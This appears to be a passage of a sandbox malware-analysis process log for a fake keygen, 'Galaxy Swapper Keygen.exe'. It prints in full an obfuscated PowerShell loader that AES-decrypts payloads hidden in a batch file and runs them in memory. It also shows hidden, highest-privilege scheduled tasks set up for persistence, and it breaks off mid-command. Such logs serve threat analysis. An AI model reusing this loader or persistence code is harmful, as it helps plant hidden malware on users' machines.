C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
42⤵
- Command and Scripting Interpreter: PowerShell
PID:6196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_323_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
43⤵
- Command and Scripting Interpreter: PowerShell
PID:9828

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.vbs"
43⤵
PID:6528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.bat" "
44⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
41⤵
PID:2308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
42⤵
PID:2472

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
42⤵
PID:2736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
43⤵
PID:2068

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
43⤵
PID:4972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
44⤵
PID:4452

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
44⤵
PID:2712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
45⤵
PID:928

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
45⤵
PID:1292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
46⤵
PID:3744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
47⤵
PID:8800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
47⤵
- Command and Scripting Interpreter: PowerShell
PID:8416

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
46⤵
PID:552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
47⤵
PID:2280

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
47⤵
PID:5056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
48⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
48⤵
PID:3384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
49⤵
PID:4820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
50⤵
PID:9148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
50⤵
- Command and Scripting Interpreter: PowerShell
PID:9188

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
49⤵
PID:5136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
50⤵
PID:5248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
51⤵
PID:7984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
51⤵
- Command and Scripting Interpreter: PowerShell
PID:7920

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
50⤵
PID:5276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
51⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
51⤵
PID:5388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
52⤵
PID:5452

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
52⤵
PID:5488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
53⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
53⤵
PID:5676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
54⤵
PID:5756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
55⤵
PID:7912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
55⤵
- Command and Scripting Interpreter: PowerShell
PID:5908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_611_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_611.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
56⤵
PID:5424

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_611.vbs"
56⤵
PID:8632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_611.bat" "
57⤵
PID:9040

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
54⤵
PID:5772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
55⤵
PID:5916

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
55⤵
PID:5944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
56⤵
PID:6020

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
56⤵
PID:6032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
57⤵
PID:6136

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
57⤵
PID:1292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
58⤵
PID:5220

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
58⤵
PID:5176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
59⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
59⤵
PID:5328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
60⤵
PID:5388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
61⤵
PID:5192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
61⤵
- Command and Scripting Interpreter: PowerShell
PID:6708

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
60⤵
PID:5620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
61⤵
PID:5488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
62⤵
PID:5348

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
62⤵
- Command and Scripting Interpreter: PowerShell
PID:4704

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
61⤵
PID:5244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
62⤵
PID:5832

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
62⤵
PID:5772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
63⤵
PID:6036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
64⤵
PID:7272

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
64⤵
- Command and Scripting Interpreter: PowerShell
PID:7228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_341_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_341.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
65⤵
PID:7608

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_341.vbs"
65⤵
PID:9024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_341.bat" "
66⤵
PID:1296

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
63⤵
PID:5208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
64⤵
PID:556

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
64⤵
PID:2436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
65⤵
PID:5636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = 